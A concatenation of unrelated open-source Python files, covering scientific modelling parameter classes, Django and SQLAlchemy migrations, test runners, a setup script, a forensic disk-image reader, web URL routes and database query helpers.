tag1=None,
value1=0.,
tag2=None,
value2=0.,
tag3=None,
value3=0.,
tag4=None,
value4=0.,
tag5=None,
value5=0.,
tag6=None,
value6=0.,
tag7=None,
value7=0.,
tag8=None,
value8=0.,
tag9=None,
value9=0.)
def out(self):
"""
returns a `esys.escript.Data` object
Link against this method to get the output of this model.
"""
d=Scalar(self.default,Function(self.domain))
if not self.tag0 is None: d.setTaggedValue(self.tag0,self.value0)
if not self.tag1 is None: d.setTaggedValue(self.tag1,self.value1)
if not self.tag2 is None: d.setTaggedValue(self.tag2,self.value2)
if not self.tag3 is None: d.setTaggedValue(self.tag3,self.value3)
if not self.tag4 is None: d.setTaggedValue(self.tag4,self.value4)
if not self.tag5 is None: d.setTaggedValue(self.tag5,self.value5)
if not self.tag6 is None: d.setTaggedValue(self.tag6,self.value6)
if not self.tag7 is None: d.setTaggedValue(self.tag7,self.value7)
if not self.tag8 is None: d.setTaggedValue(self.tag8,self.value8)
if not self.tag9 is None: d.setTaggedValue(self.tag9,self.value9)
return d
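# A minimal usage sketch (hypothetical domain and tag ids; assumes an esys.escript domain
# whose elements are tagged with the integer ids used below):
#
#     rho = ScalarDistributionFromTags()
#     rho.domain = my_domain
#     rho.default = 1000.
#     rho.tag1, rho.value1 = 1, 2700.   # e.g. a rock region
#     rho.tag2, rho.value2 = 2, 1030.   # e.g. a water region
#     density = rho.out()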
class SmoothScalarDistributionFromTags(ParameterSet):
"""
creates a smooth scalar distribution on a domain from region tags
:ivar domain: domain
:type domain: `esys.escript.Domain`
:ivar default: default value
:ivar tag0: tag 0
:type tag0: ``int``
:ivar value0: value for tag 0
:type value0: ``float``
:ivar tag1: tag 1
:type tag1: ``int``
:ivar value1: value for tag 1
:type value1: ``float``
:ivar tag2: tag 2
:type tag2: ``int``
:ivar value2: value for tag 2
:type value2: ``float``
:ivar tag3: tag 3
:type tag3: ``int``
:ivar value3: value for tag 3
:type value3: ``float``
:ivar tag4: tag 4
:type tag4: ``int``
:ivar value4: value for tag 4
:type value4: ``float``
:ivar tag5: tag 5
:type tag5: ``int``
:ivar value5: value for tag 5
:type value5: ``float``
:ivar tag6: tag 6
:type tag6: ``int``
:ivar value6: value for tag 6
:type value6: ``float``
:ivar tag7: tag 7
:type tag7: ``int``
:ivar value7: value for tag 7
:type value7: ``float``
:ivar tag8: tag 8
:type tag8: ``int``
:ivar value8: value for tag 8
:type value8: ``float``
:ivar tag9: tag 9
:type tag9: ``int``
:ivar value9: value for tag 9
:type value9: ``float``
"""
def __init__(self,**kwargs):
super(SmoothScalarDistributionFromTags, self).__init__(**kwargs)
self.declareParameter(domain=None,
default=0.,
tag0=None,
value0=0.,
tag1=None,
value1=0.,
tag2=None,
value2=0.,
tag3=None,
value3=0.,
tag4=None,
value4=0.,
tag5=None,
value5=0.,
tag6=None,
value6=0.,
tag7=None,
value7=0.,
tag8=None,
value8=0.,
tag9=None,
value9=0.)
def __update(self,tag,tag_value,value):
if self.__pde==None:
self.__pde=LinearPDE(self.domain,numSolutions=1)
mask=Scalar(0.,Function(self.domain))
mask.setTaggedValue(tag,1.)
self.__pde.setValue(Y=mask)
mask=wherePositive(abs(self.__pde.getRightHandSide()))
value*=(1.-mask)
value+=tag_value*mask
return value
def out(self):
"""
returns a `esys.escript.Data` object
Link against this method to get the output of this model.
"""
d=Scalar(self.default,Solution(self.domain))
self.__pde=None
if not self.tag0 is None: d=self.__update(self.tag0,self.value0,d)
if not self.tag1 is None: d=self.__update(self.tag1,self.value1,d)
if not self.tag2 is None: d=self.__update(self.tag2,self.value2,d)
if not self.tag3 is None: d=self.__update(self.tag3,self.value3,d)
if not self.tag4 is None: d=self.__update(self.tag4,self.value4,d)
if not self.tag5 is None: d=self.__update(self.tag5,self.value5,d)
if not self.tag6 is None: d=self.__update(self.tag6,self.value6,d)
if not self.tag7 is None: d=self.__update(self.tag7,self.value7,d)
if not self.tag8 is None: d=self.__update(self.tag8,self.value8,d)
if not self.tag9 is None: d=self.__update(self.tag9,self.value9,d)
return d
class LinearCombination(ParameterSet):
"""
Returns a linear combination of the f0*v0+f1*v1+f2*v2+f3*v3+f4*v4
:ivar f0: numerical object or None, default=None (in)
:ivar v0: numerical object or None, default=None (in)
:ivar f1: numerical object or None, default=None (in)
:ivar v1: numerical object or None, default=None (in)
:ivar f2: numerical object or None, default=None (in)
:ivar v2: numerical object or None, default=None (in)
:ivar f3: numerical object or None, default=None (in)
:ivar v3: numerical object or None, default=None (in)
:ivar f4: numerical object or None, default=None (in)
:ivar v4: numerical object or None, default=None (in)
"""
def __init__(self,**kwargs):
super(LinearCombination, self).__init__(**kwargs)
self.declareParameter(f0=None, \
v0=None, \
f1=None, \
v1=None, \
f2=None, \
v2=None, \
f3=None, \
v3=None, \
f4=None, \
v4=None)
def out(self):
"""
returns f0*v0+f1*v1+f2*v2+f3*v3+f4*v4.
Link against this method to get the output of this model.
"""
if not self.f0 is None and not self.v0 is None:
fv0 = self.f0*self.v0
else:
fv0 = None
if not self.f1 is None and not self.v1 is None:
fv1 = self.f1*self.v1
else:
fv1 = None
if not self.f2 is None and not self.v2 is None:
            fv2 = self.f2*self.v2
else:
fv2 = None
if not self.f3 is None and not self.v3 is None:
fv3 = self.f3*self.v3
else:
fv3 = None
if not self.f4 is None and not self.v4 is None:
fv4 = self.f4*self.v4
else:
fv4 = None
if fv0 is None:
out = 0.
else:
out = fv0
if not fv1 is None:
out += fv1
if not fv2 is None:
out += fv2
        if not fv3 is None:
            out += fv3
        if not fv4 is None:
            out += fv4
        return out
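# Illustrative usage sketch (an addition, not part of the original module).
# A LinearCombination is configured by assigning its declared parameters and
# other models are linked against out(); the Data objects below are
# hypothetical placeholders:
#
#   p = LinearCombination()
#   p.f0 = 2.
#   p.v0 = some_scalar_data
#   p.f1 = -1.
#   p.v1 = other_scalar_data
#   result = p.out()   # 2.*some_scalar_data - 1.*other_scalar_data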
class MergeConstraints(ParameterSet):
"""
    merges a list of constraints, each given as a location mask and a value, into a single constraint
"""
def __init__(self,**kwargs):
super(MergeConstraints, self).__init__(**kwargs)
self.declareParameter(location_of_constraint0=None, \
value_of_constraint0=None, \
location_of_constraint1=None, \
value_of_constraint1=None, \
location_of_constraint2=None, \
value_of_constraint2=None, \
location_of_constraint3=None, \
value_of_constraint3=None, \
location_of_constraint4=None, \
value_of_constraint4=None)
def location_of_constraint(self):
"""
        returns the mask marking the locations used to constrain a solution
:return: the mask marking the locations of the constraints
:rtype: `escript.Scalar`
"""
out_loc=0
if not self.location_of_constraint0 is None:
out_loc=wherePositive(out_loc+wherePositive(self.location_of_constraint0))
if not self.location_of_constraint1 is None:
out_loc=wherePositive(out_loc+wherePositive(self.location_of_constraint1))
if not self.location_of_constraint2 is None:
out_loc=wherePositive(out_loc+wherePositive(self.location_of_constraint2))
if not self.location_of_constraint3 is None:
out_loc=wherePositive(out_loc+wherePositive(self.location_of_constraint3))
return out_loc
def value_of_constraint(self):
"""
return the values used to constrain a solution
        :return: values to be used at the locations of the constraints. If
                 ``value`` is not given ``None`` is returned.
:rtype: `escript.Scalar`
"""
out_loc=0
out=0
if not self.location_of_constraint0 is None:
tmp=wherePositive(self.location_of_constraint0)
out=out*(1.-tmp)+self.value_of_constraint0*tmp
out_loc=wherePositive(out_loc+tmp)
if not self.location_of_constraint1 is None:
tmp=wherePositive(self.location_of_constraint1)
out=out*(1.-tmp)+self.value_of_constraint1*tmp
out_loc=wherePositive(out_loc+tmp)
if not self.location_of_constraint2 is None:
tmp=wherePositive(self.location_of_constraint2)
out=out*(1.-tmp)+self.value_of_constraint2*tmp
out_loc=wherePositive(out_loc+tmp)
if not self.location_of_constraint3 is None:
tmp=wherePositive(self.location_of_constraint3)
out=out*(1.-tmp)+self.value_of_constraint3*tmp
out_loc=wherePositive(out_loc+tmp)
return out
# vim: expandtab shiftwidth=4:
|
"""Context parser that returns a dict-like from a toml file."""
import logging
import pypyr.toml as toml
logger = logging.getLogger(__name__)
def get_parsed_context(args):
"""Parse input as path to a toml file, returns dict of toml contents."""
logger.debug("starting")
if not args:
logger.debug("pipeline invoked without context arg set. For this toml "
"parser you're looking for something like: $ pypyr "
"pipelinename ./myfile.toml")
return None
path = ' '.join(args)
logger.debug("attempting to open file: %s", path)
payload = toml.read_file(path)
# no special check whether top-level is mapping necessary, by spec toml
# can only have mapping (key-value pairs or table) at top level.
logger.debug("toml file parsed. Count: %d", len(payload))
logger.debug("done")
return payload
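# Minimal usage sketch (an illustrative addition; pypyr normally invokes
# get_parsed_context itself, and the example file path is hypothetical):
if __name__ == '__main__':
    import sys
    # e.g. python tomlparser.py ./myfile.toml
    print(get_parsed_context(sys.argv[1:]))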
|
# Generated by Django 3.0.4 on 2020-03-16 02:40
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('OfficeApp', '0005_auto_20200315_1919'),
]
operations = [
migrations.AlterField(
model_name='episode',
name='air_date',
field=models.DateField(default=None),
),
]
|
#!/usr/bin/env python
#
# Copyright 2017, Data61
# Commonwealth Scientific and Industrial Research Organisation (CSIRO)
# ABN 41 687 119 230.
#
# This software may be distributed and modified according to the terms of
# the BSD 2-Clause license. Note that NO WARRANTY is provided.
# See "LICENSE_BSD2.txt" for details.
#
# @TAG(DATA61_BSD)
#
# Builds and runs all tutorial solutions, comparing output with expected
# completion text.
import sys, os, argparse, re, pexpect, subprocess, tempfile, logging
import run
import signal
import psutil
import os.path
import xml.sax.saxutils
import manage
import common
# this assumes this script is in a directory inside the tutorial directory
TUTORIAL_DIR = common.get_tutorial_dir()
TOP_LEVEL_DIR = common.get_project_root()
# timeout per test in seconds
DEFAULT_TIMEOUT = 1800
# number of make jobs to run in parallel
DEFAULT_JOBS = 1
# Completion text for each test
COMPLETION = {
# seL4 tests
"pc99_sel4_hello-1": "hello world",
"pc99_sel4_hello-2": "(thread_2: hallo wereld)|(main: hello world)",
"pc99_sel4_hello-3": "main: got a reply: 0xffff9e9e",
"pc99_sel4_hello-4": "process_2: got a reply: 0xffff9e9e",
"pc99_sel4_hello-2-nolibs": "(thread_2: hallo wereld)|(main: hello world)",
"pc99_sel4_hello-3-nolibs": "main: got a reply: 0xffff9e9e",
"pc99_sel4_hello-timer": "timer client wakes up: got the current timer tick:",
"zynq7000_sel4_hello-1": "hello world",
"zynq7000_sel4_hello-2": "(thread_2: hallo wereld)|(main: hello world)",
"zynq7000_sel4_hello-3": "main: got a reply: 0xffff9e9e",
"zynq7000_sel4_hello-4": "process_2: got a reply: 0xffff9e9e",
"zynq7000_sel4_hello-2-nolibs": "(thread_2: hallo wereld)|(main: hello world)",
"zynq7000_sel4_hello-3-nolibs": "main: got a reply: 0xffff9e9e",
"zynq7000_sel4_hello-timer": "timer client wakes up: got the current timer tick:",
# camkes tests
"zynq7000_camkes_hello-camkes-0": "Hello CAmkES World",
"zynq7000_camkes_hello-camkes-1": "Component echo saying: hello world",
"zynq7000_camkes_hello-camkes-2": "FAULT HANDLER: data fault from client.control",
"zynq7000_camkes_hello-camkes-timer": "After the client: wakeup",
"pc99_camkes_hello-camkes-0": "Hello CAmkES World",
"pc99_camkes_hello-camkes-1": "Component echo saying: hello world",
"pc99_camkes_hello-camkes-2": "FAULT HANDLER: data fault from client.control"
}
# List of strings whose appearance in test output indicates test failure
FAILURE_TEXTS = [
pexpect.EOF,
pexpect.TIMEOUT,
"Ignoring call to sys_exit_group"
]
ARCHITECTURES = ['arm', 'ia32']
PLATFORMS = ['pc99', 'zynq7000']
def print_pexpect_failure(failure):
if failure == pexpect.EOF:
print("EOF received before completion text")
elif failure == pexpect.TIMEOUT:
print("Test timed out")
def app_names(plat, system):
"""
Yields the names of all tutorial applications for a given architecture
for a given system
"""
build_config_dir = os.path.join(TUTORIAL_DIR, 'build-config')
system_build_config_dir = os.path.join(build_config_dir, "configs-%s" % system)
pattern = re.compile("^%s_(.*)_defconfig" % plat)
for config in os.listdir(system_build_config_dir):
matches = pattern.match(config)
if matches is None:
logging.info("Ignoring incompatible build config %s" % config)
else:
logging.info("Using build config %s" % config)
app_name = matches.group(1)
yield app_name
def run_single_test(plat, system, app, timeout, jobs):
"""
Builds and runs the solution to a given tutorial application for a given
architecture for a given system, checking that the result matches the
completion text
"""
full_name = "%s_%s_%s" % (plat, system, app)
try:
completion_text = COMPLETION[full_name]
except KeyError:
logging.error("No completion text provided for %s." % full_name)
sys.exit(1)
# clean everything before each test
make_mrproper = subprocess.Popen(['make', 'mrproper'], cwd=TOP_LEVEL_DIR)
make_mrproper.wait()
    # run the test, storing output in a temporary file
temp_file = tempfile.NamedTemporaryFile(delete=True)
script_file = "%s/run.py" % (TUTORIAL_DIR)
arch = 'ia32' if plat == "pc99" else "arm"
command = '%s -a %s -j %s -p %s %s -R' % (script_file, arch, jobs, plat, app)
logging.info("Running command: %s" % command)
test = pexpect.spawn(command, cwd=TOP_LEVEL_DIR)
test.logfile = temp_file
expect_strings = [completion_text] + FAILURE_TEXTS
result = test.expect(expect_strings, timeout=timeout)
# result is the index in the completion text list corresponding to the
# text that was produced
if result == 0:
logging.info("Success!")
else:
print("<failure type='failure'>")
# print the log file's contents to help debug the failure
temp_file.seek(0)
print(xml.sax.saxutils.escape(temp_file.read()))
print_pexpect_failure(expect_strings[result])
print("</failure>")
for proc in psutil.process_iter():
if "qemu" in proc.name():
proc.kill()
temp_file.close()
def run_plat_tests(plat, system, timeout, jobs):
"""
Builds and runs all tests for a given architecture for a given system
"""
logging.info("\nRunning %s tutorial tests for %s platform..." % (system, plat))
for app in app_names(plat, system):
print("<testcase classname='sel4tutorials' name='%s_%s_%s'>" % (plat, system, app))
run_single_test(plat, system, app, timeout, jobs)
print("</testcase>")
def run_tests(timeout, jobs):
"""
Builds and runs all tests for all architectures for all systems
"""
print('<testsuite>')
for system in ['sel4', 'camkes']:
manage.main(['env', system])
manage.main(['solution'])
for plat in PLATFORMS:
run_plat_tests(plat, system, timeout, jobs)
print('</testsuite>')
def run_system_tests(system, timeout, jobs):
"""
Builds and runs all tests for all architectures for a given system
"""
print('<testsuite>')
for plat in PLATFORMS:
run_plat_tests(plat, system, timeout, jobs)
print('</testsuite>')
def set_log_level(args):
"""
Set the log level for the script from command line arguments
"""
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
elif args.quiet:
logging.basicConfig(level=logging.ERROR)
else:
logging.basicConfig(level=logging.INFO)
def main():
parser = argparse.ArgumentParser(
description="Runs all tests for sel4 tutorials or camkes tutorials")
parser.add_argument('--verbose', action='store_true',
help="Output everything including debug info")
parser.add_argument('--quiet', action='store_true',
help="Suppress output except for junit xml")
parser.add_argument('--timeout', type=int, default=DEFAULT_TIMEOUT)
parser.add_argument('--system', type=str, choices=['camkes', 'sel4'])
parser.add_argument('--jobs', type=int, default=DEFAULT_JOBS)
parser.add_argument('--single', action='store_true',
help="Run a single test. To run a single test, you need to specify the platform and application.")
parser.add_argument('--plat', type=str, choices=PLATFORMS, required='--single' in sys.argv)
parser.add_argument('--app', type=str, required='--single' in sys.argv)
args = parser.parse_args()
set_log_level(args)
if args.system is None:
run_tests(args.timeout, args.jobs)
elif args.single:
print('<testsuite>')
print("<testcase classname='sel4tutorials' name='%s_%s_%s'>" % (args.plat, args.system, args.app))
run_single_test(args.plat, args.system, args.app, args.timeout, args.jobs)
print("</testcase>")
print('</testsuite>')
else:
run_system_tests(args.system, args.timeout, args.jobs)
if __name__ == '__main__':
sys.exit(main())
|
from sqlalchemy import (
MetaData,
Table,
Column,
NVARCHAR,
)
meta = MetaData()
def upgrade(migrate_engine):
meta.bind = migrate_engine
t = Table("role", meta, autoload=True)
description = Column("description", NVARCHAR(255))
description.create(t)
def downgrade(migrate_engine):
meta.bind = migrate_engine
t = Table("role", meta, autoload=True)
t.c.description.drop()
|
# SPDX-License-Identifier: BSD-3-Clause
# Copyright (c) 2022 Scipp contributors (https://github.com/scipp)
# @author Simon Heybrock
from skbuild import setup
from setuptools import find_packages
def get_version():
import subprocess
return subprocess.run(['git', 'describe', '--tags', '--abbrev=0'],
stdout=subprocess.PIPE).stdout.decode('utf8').strip()
def get_cmake_args():
# Note: We do not specify '-DCMAKE_OSX_DEPLOYMENT_TARGET' here. It is set using the
# MACOSX_DEPLOYMENT_TARGET environment variable in the github workflow. The reason
# is that I am not sure if cibuildwheel uses this for anything else apart from
# configuring the actual build.
return []
long_description = """# Multi-dimensional data arrays with labeled dimensions
*A Python library enabling a modern and intuitive way of working with scientific data in Jupyter notebooks*
**scipp** is heavily inspired by [xarray](https://xarray.pydata.org).
It enriches raw NumPy-like multi-dimensional arrays of data by adding named dimensions and associated coordinates.
Multiple arrays can be combined into datasets.
While for many applications xarray is certainly more suitable (and definitely much more mature) than scipp, there are a number of features missing in other situations.
If your use case requires one or several of the items on the following list, using scipp may be worth considering:
- **Physical units** are stored with each data or coord array and are handled in arithmetic operations.
- **Propagation of uncertainties**.
- Support for **histograms**, i.e., **bin-edge axes**, which are longer than the data extent by 1.
- Support for scattered data and **non-destructive binning**.
This includes first and foremost **event data**, a particular form of sparse data with arrays of random-length lists, with very small list entries.
- Support for **masks stored with data**.
- Internals written in C++ for better performance (for certain applications), in combination with Python bindings.
""" # noqa #501
setup(name='scipp',
version=get_version(),
description='Multi-dimensional data arrays with labeled dimensions',
long_description=long_description,
long_description_content_type='text/markdown',
author='Scipp contributors (https://github.com/scipp)',
url='https://scipp.github.io',
license='BSD-3-Clause',
packages=find_packages(where="src"),
package_dir={'': 'src'},
cmake_args=get_cmake_args(),
cmake_install_dir='src/scipp',
include_package_data=True,
python_requires='>=3.8',
install_requires=['confuse', 'graphlib-backport', 'numpy>=1.20'],
extras_require={
"test": ["pytest", "matplotlib", "xarray", "pandas", "pythreejs"],
'all': ['h5py', 'scipy>=1.7.0', 'graphviz'],
'interactive': [
'ipympl', 'ipython', 'ipywidgets', 'matplotlib', 'jupyterlab',
'jupyterlab-widgets', 'jupyter_nbextensions_configurator', 'nodejs',
'pythreejs'
],
})
|
#!/usr/bin/env python
#
# This file is part of libigl, a simple c++ geometry processing library.
#
# Copyright (C) 2017 Sebastian Koch <[email protected]> and Daniele Panozzo <[email protected]>
#
# This Source Code Form is subject to the terms of the Mozilla Public License
# v. 2.0. If a copy of the MPL was not distributed with this file, You can
# obtain one at http://mozilla.org/MPL/2.0/.
import sys, os
# Add the igl library to the modules search path
sys.path.insert(0, os.getcwd() + "/../")
import pyigl as igl
from shared import TUTORIAL_SHARED_PATH, check_dependencies
dependencies = ["png", "glfw"]
check_dependencies(dependencies)
temp_png = os.path.join(os.getcwd(),"out.png")
def key_down(viewer, key, modifier):
if key == ord('1'):
# Allocate temporary buffers
R = igl.eigen.MatrixXuc(1280, 800)
G = igl.eigen.MatrixXuc(1280, 800)
B = igl.eigen.MatrixXuc(1280, 800)
A = igl.eigen.MatrixXuc(1280, 800)
# Draw the scene in the buffers
viewer.core().draw_buffer(viewer.data(), False, R, G, B, A)
# Save it to a PNG
igl.png.writePNG(R, G, B, A, temp_png)
elif key == ord('2'):
# Allocate temporary buffers
R = igl.eigen.MatrixXuc()
G = igl.eigen.MatrixXuc()
B = igl.eigen.MatrixXuc()
A = igl.eigen.MatrixXuc()
# Read the PNG
igl.png.readPNG(temp_png, R, G, B, A)
# Replace the mesh with a triangulated square
V = igl.eigen.MatrixXd([[-0.5, -0.5, 0],
[0.5, -0.5, 0],
[0.5, 0.5, 0],
[-0.5, 0.5, 0]])
F = igl.eigen.MatrixXd([[0, 1, 2], [2, 3, 0]]).castint()
UV = igl.eigen.MatrixXd([[0, 0], [1, 0], [1, 1], [0, 1]])
viewer.data().clear()
viewer.data().set_mesh(V, F)
viewer.data().set_uv(UV)
viewer.core().align_camera_center(V)
viewer.data().show_texture = True
# Use the image as a texture
viewer.data().set_texture(R, G, B)
else:
return False
return True
if __name__ == "__main__":
V = igl.eigen.MatrixXd()
F = igl.eigen.MatrixXi()
# Load meshes in OFF format
igl.readOFF(TUTORIAL_SHARED_PATH + "bunny.off", V, F)
viewer = igl.glfw.Viewer()
print(
"Usage: Press 1 to render the scene and save it in a png. \nPress 2 to load the saved png and use it as a texture.")
viewer.callback_key_down = key_down
viewer.data().set_mesh(V, F)
viewer.launch()
os.remove(temp_png)
|
#!/usr/bin/python
# Sample program for step 5 in becoming a DFIR Wizard!
# No license as this code is simple and free!
import sys
import pytsk3
import datetime
import pyewf
class ewf_Img_Info(pytsk3.Img_Info):
def __init__(self, ewf_handle):
self._ewf_handle = ewf_handle
super(ewf_Img_Info, self).__init__(
url="", type=pytsk3.TSK_IMG_TYPE_EXTERNAL)
def close(self):
self._ewf_handle.close()
def read(self, offset, size):
self._ewf_handle.seek(offset)
return self._ewf_handle.read(size)
def get_size(self):
return self._ewf_handle.get_media_size()
filenames = pyewf.glob("SSFCC-Level5.E01")
ewf_handle = pyewf.handle()
ewf_handle.open(filenames)
imagehandle = ewf_Img_Info(ewf_handle)
partitionTable = pytsk3.Volume_Info(imagehandle)
for partition in partitionTable:
print partition.addr, partition.desc, "%ss(%s)" % (partition.start, partition.start * 512), partition.len
if 'NTFS' in partition.desc:
filesystemObject = pytsk3.FS_Info(imagehandle, offset=(partition.start*512))
fileobject = filesystemObject.open("/$MFT")
print "File Inode:",fileobject.info.meta.addr
print "File Name:",fileobject.info.name.name
print "File Creation Time:",datetime.datetime.fromtimestamp(fileobject.info.meta.crtime).strftime('%Y-%m-%d %H:%M:%S')
outFileName = str(partition.addr)+fileobject.info.name.name
print outFileName
        outfile = open(outFileName, 'wb')
        filedata = fileobject.read_random(0, fileobject.info.meta.size)
        outfile.write(filedata)
        outfile.close()
|
import os
from django.conf import settings
from django.core.exceptions import PermissionDenied
from annotation.models import ManualVariantEntryType
from annotation.models.models import ManualVariantEntryCollection, ManualVariantEntry
from annotation.tasks.process_manual_variants_task import ManualVariantsPostInsertTask, get_manual_variant_tuples
from library.django_utils.django_file_utils import get_import_processing_dir
from library.utils import full_class_name
from library.vcf_utils import write_vcf_from_tuples
from snpdb.models.models_enums import ImportSource
from snpdb.models.models_genome import GenomeBuild
from upload.models import UploadPipeline, UploadedFile, UploadStep, UploadedManualVariantEntryCollection
from upload.models.models_enums import UploadedFileTypes, UploadStepTaskType, VCFPipelineStage, UploadStepOrigin
from upload.upload_processing import process_upload_pipeline
class CreateManualVariantForbidden(PermissionDenied):
pass
def can_create_variants(user) -> bool:
can_create = settings.UPLOAD_ENABLED and settings.VARIANT_MANUAL_CREATE
can_create &= user.is_superuser or settings.VARIANT_MANUAL_CREATE_BY_NON_ADMIN
return can_create
def check_can_create_variants(user):
if not can_create_variants(user):
raise CreateManualVariantForbidden()
def create_manual_variants(user, genome_build: GenomeBuild, variants_text: str):
check_can_create_variants(user)
mvec = ManualVariantEntryCollection.objects.create(user=user,
genome_build=genome_build)
variants_list = []
for i, line in enumerate(variants_text.split('\n')):
line = line.strip()
entry_type = ManualVariantEntry.get_entry_type(line)
kwargs = {"manual_variant_entry_collection": mvec,
"line_number": i + 1,
"entry_text": line,
"entry_type": entry_type}
if entry_type == ManualVariantEntryType.UNKNOWN:
kwargs["error_message"] = f"Couldn't determine type of '{line}'"
mve = ManualVariantEntry.objects.create(**kwargs)
if entry_type != ManualVariantEntryType.UNKNOWN:
try:
variants_list.extend(get_manual_variant_tuples(mve))
except ValueError as ve:
mve.error_message = f"Error parsing {entry_type}: '{ve}'"
mve.save()
if not variants_list:
# Pipeline would have just hung forever
raise ValueError("No valid variants to create!")
# Because we need to normalise / insert etc, it's easier just to write a VCF
# and run through upload pipeline
working_dir = get_import_processing_dir(mvec.pk, "manual_variants")
vcf_filename = os.path.join(working_dir, "manual_variant_entry.vcf")
write_vcf_from_tuples(vcf_filename, variants_list)
uploaded_file = UploadedFile.objects.create(path=vcf_filename,
import_source=ImportSource.WEB,
name='Manual Variant Entry',
user=user,
file_type=UploadedFileTypes.VCF_INSERT_VARIANTS_ONLY,
visible=False)
UploadedManualVariantEntryCollection.objects.create(uploaded_file=uploaded_file,
collection=mvec)
upload_pipeline = UploadPipeline.objects.create(uploaded_file=uploaded_file)
add_manual_variant_upload_steps(upload_pipeline)
process_upload_pipeline(upload_pipeline)
return mvec
def add_manual_variant_upload_steps(upload_pipeline):
mv_post_insert_clazz = ManualVariantsPostInsertTask
class_name = full_class_name(mv_post_insert_clazz)
UploadStep.objects.create(upload_pipeline=upload_pipeline,
name="ManualVariantsPostInsertTask",
origin=UploadStepOrigin.USER_ADDITION,
sort_order=10,
task_type=UploadStepTaskType.CELERY,
pipeline_stage_dependency=VCFPipelineStage.DATA_INSERTION,
script=class_name)
|
from ..i18n import i18n
class EasyBackupException(Exception):
def __init__(self, code, **kwargs):
self.code = code
self.message = i18n.t(code, **kwargs)
self.kwargs = kwargs
def __str__(self):
return self.message
class BackupParseNameError(EasyBackupException):
pass
class RepositoryLinkNotFound(EasyBackupException):
pass
class BuilderChainningIncompatibility(EasyBackupException):
pass
|
#
# OtterTune - urls.py
#
# Copyright (c) 2017-18, Carnegie Mellon University Database Group
#
import debug_toolbar
from django.conf.urls import include, url
from django.contrib import admin
from django.contrib.staticfiles.views import serve
from django.views.decorators.cache import never_cache
from website import settings
from website import views as website_views
admin.autodiscover()
# pylint: disable=line-too-long,invalid-name
urlpatterns = [
# URLs for user registration & login
url(r'^signup/', website_views.signup_view, name='signup'),
url(r'^login/', website_views.login_view, name='login'),
url(r'^logout/$', website_views.logout_view, name='logout'),
url(r'^change_password/', website_views.change_password_view, name='change_password'),
# URLs for project views
url(r'^$', website_views.redirect_home),
url(r'^projects/$', website_views.home_projects_view, name='home_projects'),
url(r'^projects/new/$', website_views.create_or_edit_project, name='new_project'),
url(r'^projects/(?P<project_id>[0-9]+)/edit/$', website_views.create_or_edit_project, name='edit_project'),
url(r'^projects/delete/$', website_views.delete_project, name="delete_project"),
# URLs for session views
url(r'^projects/(?P<project_id>[0-9]+)/sessions$', website_views.project_sessions_view, name='project_sessions'),
url(r'^projects/(?P<project_id>[0-9]+)/sessions/(?P<session_id>[0-9]+)/$', website_views.session_view, name='session'),
url(r'^projects/(?P<project_id>[0-9]+)/sessions/new/$', website_views.create_or_edit_session, name='new_session'),
url(r'^projects/(?P<project_id>[0-9]+)/sessions/(?P<session_id>[0-9]+)/edit/$', website_views.create_or_edit_session, name='edit_session'),
url(r'^projects/(?P<project_id>[0-9]+)/sessions/(?P<session_id>[0-9]+)/editKnobs/$', website_views.edit_knobs, name='edit_knobs'),
url(r'^projects/(?P<project_id>[0-9]+)/sessions/delete/$', website_views.delete_session, name='delete_session'),
# URLs for result views
url(r'^new_result/', website_views.new_result, name='new_result'),
url(r'^projects/(?P<project_id>[0-9]+)/sessions/(?P<session_id>[0-9]+)/results/(?P<result_id>[0-9]+)/$', website_views.result_view, name='result'),
url(r'^projects/(?P<project_id>[0-9]+)/sessions/(?P<session_id>[0-9]+)/workloads/(?P<wkld_id>[0-9]+)/$', website_views.workload_view, name='workload'),
url(r'^projects/(?P<project_id>[0-9]+)/sessions/(?P<session_id>[0-9]+)/knobs/(?P<data_id>[0-9]+)/$', website_views.knob_data_view, name='knob_data'),
url(r'^projects/(?P<project_id>[0-9]+)/sessions/(?P<session_id>[0-9]+)/metrics/(?P<data_id>[0-9]+)/$', website_views.metric_data_view, name='metric_data'),
url(r'^projects/(?P<project_id>[0-9]+)/sessions/(?P<session_id>[0-9]+)/results/(?P<result_id>[0-9]+)/status$', website_views.tuner_status_view, name="tuner_status"),
# URLs for the DBMS knob & metric reference pages
url(r'^ref/(?P<dbms_name>.+)/(?P<version>.+)/knobs/(?P<knob_name>.+)/$', website_views.dbms_knobs_reference, name="dbms_knobs_ref"),
url(r'^ref/(?P<dbms_name>.+)/(?P<version>.+)/metrics/(?P<metric_name>.+)/$', website_views.dbms_metrics_reference, name="dbms_metrics_ref"),
# URLs to the helper functions called by the javascript code
url(r'^get_workload_data/', website_views.get_workload_data),
url(r'^get_data/', website_views.get_timeline_data),
url(r'^get_result_data_file/', website_views.download_next_config),
# Admin URLs
# Uncomment the admin/doc line below to enable admin documentation:
# url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
url(r'^admin/', admin.site.urls),
# Static URL
url(r'^static/(?P<path>.*)$', never_cache(serve)),
# Back door
url(r'^query_and_get/(?P<upload_code>[0-9a-zA-Z]+)$', website_views.give_result, name="backdoor"),
]
if settings.DEBUG:
urlpatterns.insert(0, url(r'^__debug__/', include(debug_toolbar.urls)))
|
"""
:codeauthor: Jayesh Kariya <[email protected]>
"""
import sys
import salt.modules.pam as pam
from tests.support.mock import mock_open, patch
from tests.support.unit import TestCase, skipIf
MOCK_FILE = "ok ok ignore "
@skipIf(sys.platform.startswith("openbsd"), "OpenBSD does not use PAM")
class PamTestCase(TestCase):
"""
Test cases for salt.modules.pam
"""
# 'read_file' function tests: 1
def test_read_file(self):
"""
Test if the parsing function works
"""
with patch("os.path.exists", return_value=True), patch(
"salt.utils.files.fopen", mock_open(read_data=MOCK_FILE)
):
self.assertListEqual(
pam.read_file("/etc/pam.d/login"),
[
{
"arguments": [],
"control_flag": "ok",
"interface": "ok",
"module": "ignore",
}
],
)
|
import datetime as dt
def get_query(type=0, **kwargs):
query = False
if type == 0:
query = [
{
'$sort': {
'datetime': -1
}
}, {
'$limit': 1
}
]
elif type == 1:
dnow = dt.datetime.now()
date_from = kwargs['date_from'] if 'date_from' in kwargs else dnow - \
dt.timedelta(30)
date_to = kwargs['date_to'] if 'date_to' in kwargs else dnow
query = [
{
'$match': {
'datetime': {
'$gte': date_from,
'$lt': date_to
}
}
}, {
'$group': {
'_id': {
'$dayOfYear': '$datetime'
},
'temp_data': {
'$first': '$$ROOT'
}
}
}, {
'$sort': {
'_id': 1
}
}, {
'$replaceRoot': {
'newRoot': '$temp_data'
}
}
]
return query
